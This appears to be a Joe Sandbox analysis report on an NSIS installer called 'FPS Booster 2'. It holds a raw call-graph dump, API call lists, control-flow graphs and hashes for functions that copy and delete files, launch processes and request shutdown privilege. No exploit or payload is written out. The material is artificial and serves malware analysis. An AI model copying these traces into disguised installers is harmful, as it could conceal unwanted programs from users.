5269 406792 CharPrevW 5268->5269 5270 40361f 5268->5270 5269->5268 5269->5270 5271 406035 lstrcpynW 5270->5271 5271->5147 5273 403357 5272->5273 5273->5166 5275 4032f3 5274->5275 5276 4032db 5274->5276 5279 403303 GetTickCount 5275->5279 5280 4032fb 5275->5280 5277 4032e4 DestroyWindow 5276->5277 5278 4032eb 5276->5278 5277->5278 5278->5150 5282 403311 CreateDialogParamW ShowWindow 5279->5282 5283 403334 5279->5283 5308 40635e 5280->5308 5282->5283 5283->5150 5285->5157 5286->5156 5288 40339a 5287->5288 5289 4033c7 5288->5289 5312 403368 SetFilePointer 5288->5312 5290 403336 ReadFile 5289->5290 5292 4033d2 5290->5292 5293 403546 5292->5293 5294 4033eb GetTickCount 5292->5294 5302 4033d6 5292->5302 5295 40354a 5293->5295 5299 40356e 5293->5299 5294->5302 5307 403438 5294->5307 5296 403336 ReadFile 5295->5296 5296->5302 5297 403336 ReadFile 5297->5307 5298 403336 ReadFile 5298->5299 5299->5298 5300 40358d WriteFile 5299->5300 5299->5302 5301 4035a1 5300->5301 5300->5302 5301->5299 5301->5302 5302->5164 5303 40348a GetTickCount 5303->5307 5304 4034af MulDiv wsprintfW 5305 404f9e 25 API calls 5304->5305 5305->5307 5306 4034f3 WriteFile 5306->5302 5306->5307 5307->5297 5307->5302 5307->5303 5307->5304 5307->5306 5309 40637b PeekMessageW 5308->5309 5310 406371 DispatchMessageW 5309->5310 5311 403301 5309->5311 5310->5309 5311->5150 5312->5289 5314 403ed5 5313->5314 5337 405f7d wsprintfW 5314->5337 5316 403f49 5317 406831 18 API calls 5316->5317 5318 403f55 SetWindowTextW 5317->5318 5319 403f70 5318->5319 5320 403f8b 5319->5320 5321 406831 18 API calls 5319->5321 5320->5180 5321->5319 5322->5176 5323->5182 5338 406035 lstrcpynW 5324->5338 5326 403eb4 5327 40674e 3 API calls 5326->5327 5328 403eba lstrcatW 5327->5328 5328->5203 5330 403ddb SendMessageW 5329->5330 5334 405096 5330->5334 5331 403ddb SendMessageW 5332 4050d1 OleUninitialize 5331->5332 5332->5215 5333 4062cf 11 API calls 5333->5334 5334->5333 5335 40139d 80 API calls 5334->5335 5336 4050c1 5334->5336 5335->5334 5336->5331 5337->5316 5338->5326 5339->5227 5341 403cbd 5340->5341 5342 4038a2 5341->5342 5343 403cc2 FreeLibrary GlobalFree 5341->5343 5344 406cc7 5342->5344 5343->5342 5343->5343 5345 4067aa 18 API calls 5344->5345 5346 406cda 5345->5346 5347 406ce3 DeleteFileW 5346->5347 5348 406cfa 5346->5348 5349 4038ae OleUninitialize 5347->5349 5350 406e77 5348->5350 5391 406035 lstrcpynW 5348->5391 5349->5085 5349->5086 5350->5349 5353 406e84 5350->5353 5357 406301 2 API calls 5350->5357 5352 406d25 5354 406d39 5352->5354 5355 406d2f lstrcatW 5352->5355 5361 4062cf 11 API calls 5353->5361 5358 40677d 2 API calls 5354->5358 5356 406d3f 5355->5356 5360 406d4f lstrcatW 5356->5360 5362 406d57 lstrlenW FindFirstFileW 5356->5362 5359 406e90 5357->5359 5358->5356 5359->5349 5363 40674e 3 API calls 5359->5363 5360->5362 5361->5349 5364 406e67 5362->5364 5377 406d7e 5362->5377 5365 406e9a 5363->5365 5364->5350 5367 4062cf 11 API calls 5365->5367 5366 405d32 CharNextW 5366->5377 5368 406ea5 5367->5368 5369 405e5c 2 API calls 5368->5369 5370 406ead RemoveDirectoryW 5369->5370 5374 406ef0 5370->5374 5375 406eb9 5370->5375 5371 406e44 FindNextFileW 5373 406e5c FindClose 5371->5373 5371->5377 5373->5364 5378 404f9e 25 API calls 5374->5378 5375->5353 5376 406ebf 5375->5376 5379 4062cf 11 API calls 5376->5379 5377->5366 5377->5371 5381 406cc7 72 API calls 5377->5381 5387 404f9e 25 API calls 5377->5387 5388 4062cf 11 API calls 5377->5388 5389 404f9e 25 API calls 5377->5389 5390 406c94 42 API calls 5377->5390 5392 406035 lstrcpynW 5377->5392 5393 405e5c GetFileAttributesW 5377->5393 5378->5349 5380 406ec9 5379->5380 5383 404f9e 25 API calls 5380->5383 5381->5377 5385 406ed3 5383->5385 5386 406c94 42 API calls 5385->5386 5386->5349 5387->5371 5388->5377 5389->5377 5390->5377 5391->5352 5392->5377 5394 405e79 DeleteFileW 5393->5394 5395 405e6b SetFileAttributesW 5393->5395 5394->5377 5395->5394 5428 6ffb188a GetProcessHeap HeapAlloc 5429 6ffb18c1 5428->5429 5430 6ffb18d0 5428->5430 5432 6ffb1e83 2 API calls 5429->5432 5431 6ffb1e34 2 API calls 5430->5431 5433 6ffb18d8 5431->5433 5434 6ffb18cb 5432->5434 5435 6ffb18dc 5433->5435 5463 6ffb2055 5433->5463 5436 6ffb1e83 2 API calls 5435->5436 5438 6ffb18e6 GetProcessHeap 5436->5438 5440 6ffb1b4d RtlFreeHeap 5438->5440 5439 6ffb18f5 5441 6ffb2055 2 API calls 5439->5441 5440->5434 5442 6ffb18fd 5441->5442 5466 6ffb1313 GetClientRect 5442->5466 5444 6ffb1915 5445 6ffb1e34 2 API calls 5444->5445 5446 6ffb191d 5445->5446 5446->5435 5447 6ffb1921 GetProcessHeap HeapReAlloc lstrcmpiW 5446->5447 5448 6ffb197c lstrcmpiW 5447->5448 5449 6ffb1961 5447->5449 5448->5449 5450 6ffb19a3 lstrcmpiW 5448->5450 5452 6ffb1a9c lstrcmpiW 5449->5452 5450->5449 5451 6ffb19ca lstrcmpiW 5450->5451 5451->5449 5453 6ffb19f1 lstrcmpiW 5451->5453 5454 6ffb1aa8 5452->5454 5455 6ffb1aad CreateWindowExW SetPropW SendMessageW SendMessageW 5452->5455 5453->5449 5456 6ffb1a15 lstrcmpiW 5453->5456 5454->5455 5457 6ffb1b3c 5455->5457 5458 6ffb1b21 SetWindowLongW 5455->5458 5456->5449 5459 6ffb1a39 lstrcmpiW 5456->5459 5460 6ffb2085 3 API calls 5457->5460 5458->5457 5459->5449 5461 6ffb1a5d lstrcmpiW 5459->5461 5462 6ffb1b42 GetProcessHeap 5460->5462 5461->5449 5462->5440 5464 6ffb1e34 2 API calls 5463->5464 5465 6ffb206f 5464->5465 5465->5439 5467 6ffb1e34 2 API calls 5466->5467 5468 6ffb134c 5467->5468 5482 6ffb1350 5468->5482 5483 6ffb128f lstrlenW CharPrevW 5468->5483 5471 6ffb1e34 2 API calls 5472 6ffb137a 5471->5472 5473 6ffb128f 4 API calls 5472->5473 5472->5482 5474 6ffb138e 5473->5474 5475 6ffb1e34 2 API calls 5474->5475 5476 6ffb13a0 5475->5476 5477 6ffb128f 4 API calls 5476->5477 5476->5482 5478 6ffb13b2 5477->5478 5479 6ffb1e34 2 API calls 5478->5479 5480 6ffb13c4 5479->5480 5481 6ffb128f 4 API calls 5480->5481 5480->5482 5481->5482 5482->5444 5484 6ffb12b4 5483->5484 5485 6ffb12bb MulDiv 5484->5485 5486 6ffb12ce 5484->5486 5489 6ffb12f6 5485->5489 5488 6ffb12d3 MapDialogRect 5486->5488 5486->5489 5488->5489 5489->5471 5665 401cb2 5666 40145c 18 API calls 5665->5666 5667 401c54 5666->5667 5668 401c64 5667->5668 5669 4062cf 11 API calls 5667->5669 5670 401c59 5669->5670 5671 406cc7 81 API calls 5670->5671 5671->5668 6774 6e9e236c 6775 6e9e2407 6774->6775 6776 6e9e23d1 6774->6776 6776->6775 6777 6e9e23e3 GlobalAlloc 6776->6777 6777->6776 6778 4021b5 6779 40145c 18 API calls 6778->6779 6780 4021bb 6779->6780 6781 40145c 18 API calls 6780->6781 6782 4021c4 6781->6782 6783 40145c 18 API calls 6782->6783 6784 4021cd 6783->6784 6785 40145c 18 API calls 6784->6785 6786 4021d6 6785->6786 6787 404f9e 25 API calls 6786->6787 6788 4021e2 ShellExecuteW 6787->6788 6789 40220d 6788->6789 6792 40221b 6788->6792 6791 4062cf 11 API calls 6789->6791 6790 4062cf 11 API calls 6793 402230 6790->6793 6791->6792 6792->6790 6021 6e9e10e9 6024 6e9e1859 6021->6024 6023 6e9e1100 GlobalFree 6025 6e9e15a3 3 API calls 6024->6025 6026 6e9e185f 6025->6026 6027 6e9e1865 6026->6027 6028 6e9e1871 GlobalFree 6026->6028 6027->6023 6028->6023 6029 402238 6030 40145c 18 API calls 6029->6030 6031 40223e 6030->6031 6032 4062cf 11 API calls 6031->6032 6033 40224b 6032->6033 6034 404f9e 25 API calls 6033->6034 6035 402255 6034->6035 6036 405c6b 2 API calls 6035->6036 6037 40225b 6036->6037 6038 4022ac CloseHandle 6037->6038 6039 4062cf 11 API calls 6037->6039 6042 4030e3 6038->6042 6041 40226d 6039->6041 6041->6038 6043 402283 WaitForSingleObject 6041->6043 6045 40635e 2 API calls 6041->6045 6043->6041 6044 402291 GetExitCodeProcess 6043->6044 6044->6038 6046 4022a3 6044->6046 6045->6043 6048 405f7d wsprintfW 6046->6048 6048->6038 5685 401eb9 5686 401f24 5685->5686 5693 401ec6 5685->5693 5687 401f53 GlobalAlloc 5686->5687 5692 401f28 5686->5692 5690 406831 18 API calls 5687->5690 5688 401ed5 5689 4062cf 11 API calls 5688->5689 5703 401ee2 5689->5703 5696 401f46 5690->5696 5691 401f36 5709 406035 lstrcpynW 5691->5709 5692->5691 5697 4062cf 11 API calls 5692->5697 5693->5688 5694 401ef7 5693->5694 5707 406035 lstrcpynW 5694->5707 5699 402708 5696->5699 5700 402387 GlobalFree 5696->5700 5697->5691 5700->5699 5701 406831 18 API calls 5701->5703 5702 401f06 5708 406035 lstrcpynW 5702->5708 5703->5699 5703->5701 5705 401f15 5710 406035 lstrcpynW 5705->5710 5707->5702 5708->5705 5709->5696 5710->5699 6049 404039 6050 404096 6049->6050 6051 404046 lstrcpynA lstrlenA 6049->6051 6051->6050 6052 404077 6051->6052 6052->6050 6053 404083 GlobalFree 6052->6053 6053->6050 6794 6ffb1c01 6795 6ffb2025 2 API calls 6794->6795 6796 6ffb1c06 KillTimer 6795->6796 6797 6ffb1000 6798 6ffb101c 6797->6798 6799 6ffb1007 SendMessageW 6797->6799 6799->6798 6800 6e9e1060 6801 6e9e15a3 3 API calls 6800->6801 6803 6e9e107c 6801->6803 6802 6e9e10e5 6803->6802 6804 6e9e1859 4 API calls 6803->6804 6805 6e9e109a 6803->6805 6804->6805 6806 6e9e1859 4 API calls 6805->6806 6807 6e9e10aa 6806->6807 6808 6e9e10ba 6807->6808 6809 6e9e10b1 GlobalSize 6807->6809 6810 6e9e10be GlobalAlloc 6808->6810 6811 6e9e10cf 6808->6811 6809->6808 6812 6e9e1880 2 API calls 6810->6812 6813 6e9e10da GlobalFree 6811->6813 6812->6811 6813->6802

                                                Executed Functions

                                                Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 193 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 200 403947-40394a 193->200 201 40394f-403963 call 405d32 CharNextW 193->201 200->201 204 4039f6-4039fc 201->204 205 403a02 204->205 206 403968-40396e 204->206 207 403a21-403a39 GetTempPathW call 4037f8 205->207 208 403970-403976 206->208 209 403978-40397c 206->209 219 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 207->219 220 403a5f-403a79 DeleteFileW call 4035b3 207->220 208->208 208->209 210 403984-403988 209->210 211 40397e-403983 209->211 213 4039e4-4039f1 call 405d32 210->213 214 40398a-403991 210->214 211->210 213->204 228 4039f3 213->228 217 403993-40399a 214->217 218 4039a6-4039b8 call 40382c 214->218 223 4039a1 217->223 224 40399c-40399f 217->224 233 4039ba-4039c1 218->233 234 4039cd-4039e2 call 40382c 218->234 219->220 231 403af8-403b07 call 403885 OleUninitialize 219->231 220->231 232 403a7b-403a81 220->232 223->218 224->218 224->223 228->204 247 403bfa-403c00 231->247 248 403b0d-403b1d call 405ccc ExitProcess 231->248 235 403ae1-403ae8 call 405958 232->235 236 403a83-403a8c call 405d32 232->236 238 4039c3-4039c6 233->238 239 4039c8 233->239 234->213 249 403a04-403a1c call 40824c call 406035 234->249 246 403aed-403af3 call 406113 235->246 250 403aa5-403aa7 236->250 238->234 238->239 239->234 246->231 253 403c02-403c1f call 406328 * 3 247->253 254 403c7d-403c85 247->254 249->207 258 403aa9-403ab3 250->258 259 403a8e-403aa0 call 40382c 250->259 286 403c21-403c23 253->286 287 403c69-403c74 ExitWindowsEx 253->287 260 403c87 254->260 261 403c8b 254->261 266 403b23-403b3d lstrcatW lstrcmpiW 258->266 267 403ab5-403ac5 call 4067aa 258->267 259->258 274 403aa2 259->274 260->261 266->231 271 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 266->271 267->231 280 403ac7-403add call 406035 * 2 267->280 272 403b62-403b82 call 406035 * 2 271->272 273 403b57-403b5d call 406035 271->273 294 403b87-403ba3 call 406831 DeleteFileW 272->294 273->272 274->250 280->235 286->287 288 403c25-403c27 286->288 287->254 291 403c76-403c78 call 40141d 287->291 288->287 292 403c29-403c3b GetCurrentProcess 288->292 291->254 292->287 299 403c3d-403c5f 292->299 300 403be4-403bec 294->300 301 403ba5-403bb5 CopyFileW 294->301 299->287 300->294 302 403bee-403bf5 call 406c94 300->302 301->300 303 403bb7-403bd7 call 406c94 call 406831 call 405c6b 301->303 302->231 303->300 313 403bd9-403be0 CloseHandle 303->313 313->300
                                                APIs
                                                • #17.COMCTL32 ref: 004038CE
                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                • OleInitialize.OLE32(00000000), ref: 004038E0
                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                • OleUninitialize.OLE32(?), ref: 00403AFD
                                                • ExitProcess.KERNEL32 ref: 00403B1D
                                                • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                • API String ID: 2435955865-3712954417
                                                • Opcode ID: ac3f82c8583c87bde93f90980a1070f9faa323d75b06bd3b84399b38fb4e9a16
                                                • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                • Opcode Fuzzy Hash: ac3f82c8583c87bde93f90980a1070f9faa323d75b06bd3b84399b38fb4e9a16
                                                • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 691 406cc7-406ce1 call 4067aa 694 406ce3-406cf5 DeleteFileW 691->694 695 406cfa-406d05 691->695 696 406ef9-406efb 694->696 697 406d07-406d09 695->697 698 406d19-406d2d call 406035 695->698 699 406e77-406e7c 697->699 700 406d0f-406d13 697->700 707 406d39-406d3a call 40677d 698->707 708 406d2f-406d37 lstrcatW 698->708 702 406ef7-406ef8 699->702 703 406e7e-406e82 699->703 700->698 700->699 702->696 705 406e84-406e89 703->705 706 406e8b-406e92 call 406301 703->706 709 406ee1-406eee call 4062cf 705->709 706->702 717 406e94-406eb7 call 40674e call 4062cf call 405e5c RemoveDirectoryW 706->717 710 406d3f-406d43 707->710 708->710 709->702 714 406d45-406d4d 710->714 715 406d4f-406d55 lstrcatW 710->715 714->715 718 406d57-406d78 lstrlenW FindFirstFileW 714->718 715->718 741 406ef0-406ef2 call 404f9e 717->741 742 406eb9-406ebd 717->742 721 406e67 718->721 722 406d7e-406d93 call 405d32 718->722 723 406e69-406e6c 721->723 729 406d95-406d99 722->729 730 406d9e-406da2 722->730 723->699 726 406e6e-406e73 723->726 726->699 729->730 732 406d9b 729->732 733 406dc0-406dd0 call 406035 730->733 734 406da4-406dab 730->734 732->730 747 406dd2-406dda 733->747 748 406de7-406e04 call 4062cf call 405e5c DeleteFileW 733->748 737 406db1-406db4 734->737 738 406e44-406e56 FindNextFileW 734->738 737->733 743 406db6-406dba 737->743 738->722 740 406e5c-406e65 FindClose 738->740 740->723 741->702 745 406edc 742->745 746 406ebf-406eda call 4062cf call 404f9e call 406c94 742->746 743->733 743->738 745->709 746->702 747->738 751 406ddc-406de5 call 406cc7 747->751 761 406e06-406e0a 748->761 762 406e3d-406e3f call 404f9e 748->762 751->738 764 406e29-406e3b call 4062cf 761->764 765 406e0c-406e27 call 4062cf call 404f9e call 406c94 761->765 762->738 764->738 765->738
                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,004CF0A0), ref: 00406CE4
                                                • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                • lstrlenW.KERNEL32(?), ref: 00406D58
                                                • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                • FindClose.KERNEL32(?), ref: 00406E5F
                                                Strings
                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                • ptF, xrefs: 00406D1A
                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                • \*.*, xrefs: 00406D2F
                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                • API String ID: 2035342205-1650287579
                                                • Opcode ID: f7a733ba7b7dda8f767778852903590a58a16c07b963c85795d8b3373a8eb2b2
                                                • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                • Opcode Fuzzy Hash: f7a733ba7b7dda8f767778852903590a58a16c07b963c85795d8b3373a8eb2b2
                                                • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                Function 00406831 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 212stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 861 406831-40683c 862 40683e-40684d 861->862 863 40684f-406863 861->863 862->863 864 406865-406872 863->864 865 40687b-406881 863->865 864->865 866 406874-406877 864->866 867 406887-406888 865->867 868 406aad-406ab6 865->868 866->865 871 406889-406896 867->871 869 406ac1-406ac2 868->869 870 406ab8-406abc call 406035 868->870 870->869 873 406aab-406aac 871->873 874 40689c-4068ac 871->874 873->868 875 4068b2-4068b5 874->875 876 406a86 874->876 877 406a89 875->877 878 4068bb-4068f9 875->878 876->877 879 406a99-406a9c 877->879 880 406a8b-406a97 877->880 881 406a19-406a22 878->881 882 4068ff-40690a GetVersion 878->882 883 406a9f-406aa5 879->883 880->883 886 406a24-406a27 881->886 887 406a5b-406a64 881->887 884 406928 882->884 885 40690c-406914 882->885 883->871 883->873 891 40692f-406936 884->891 885->884 890 406916-40691a 885->890 888 406a37-406a46 call 406035 886->888 889 406a29-406a35 call 405f7d 886->889 892 406a72-406a84 lstrlenW 887->892 893 406a66-406a6d call 406831 887->893 902 406a4b-406a51 888->902 889->902 890->884 895 40691c-406920 890->895 897 406938-40693a 891->897 898 40693b-40693d 891->898 892->883 893->892 895->884 901 406922-406926 895->901 897->898 903 406979-40697c 898->903 904 40693f-406965 call 405eff 898->904 901->891 902->892 905 406a53-406a59 call 406064 902->905 907 40698c-40698f 903->907 908 40697e-40698a GetSystemDirectoryW 903->908 916 406a05-406a09 904->916 917 40696b-406974 call 406831 904->917 905->892 910 406991-40699f GetWindowsDirectoryW 907->910 911 4069fb-4069fd 907->911 909 4069ff-406a03 908->909 909->905 909->916 910->911 911->909 915 4069a1-4069ab 911->915 918 4069c5-4069db SHGetSpecialFolderLocation 915->918 919 4069ad-4069b0 915->919 916->905 921 406a0b-406a17 lstrcatW 916->921 917->909 923 4069f6-4069f8 918->923 924 4069dd-4069f4 SHGetPathFromIDListW CoTaskMemFree 918->924 919->918 922 4069b2-4069b9 919->922 921->905 926 4069c1-4069c3 922->926 923->911 924->909 924->923 926->909 926->918
                                                APIs
                                                • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D70,76F923A0,00000000), ref: 00406902
                                                • GetSystemDirectoryW.KERNEL32(Show,00002004), ref: 00406984
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                • GetWindowsDirectoryW.KERNEL32(Show,00002004), ref: 00406997
                                                • lstrcatW.KERNEL32(Show,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                • lstrlenW.KERNEL32(Show,00445D80,?,00000000,00404FD5,00445D80,00000000,00426D70,76F923A0,00000000), ref: 00406A73
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                • String ID: Show$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 3581403547-2066119300
                                                • Opcode ID: 297fba6cd9e7c7e3f7edb2b2bb5f8a466a25db9789c8a0bf07f022a95d38d7f5
                                                • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                • Opcode Fuzzy Hash: 297fba6cd9e7c7e3f7edb2b2bb5f8a466a25db9789c8a0bf07f022a95d38d7f5
                                                • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                • FindClose.KERNEL32(00000000), ref: 00406318
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: jF
                                                • API String ID: 2295610775-3349280890
                                                • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
